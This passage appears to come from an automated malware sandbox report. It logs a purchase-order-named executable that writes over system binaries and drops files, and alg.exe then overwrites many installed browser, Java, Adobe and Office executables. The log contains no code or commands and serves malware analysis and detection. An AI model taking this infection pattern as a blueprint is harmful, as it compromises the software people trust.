                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                          Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Users\user\AppData\Roaming\zeXKjViL.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\firefox.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\updater.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
                          Source: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJump to dropped file
                          Source: C:\Windows\System32\alg.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to dropped file
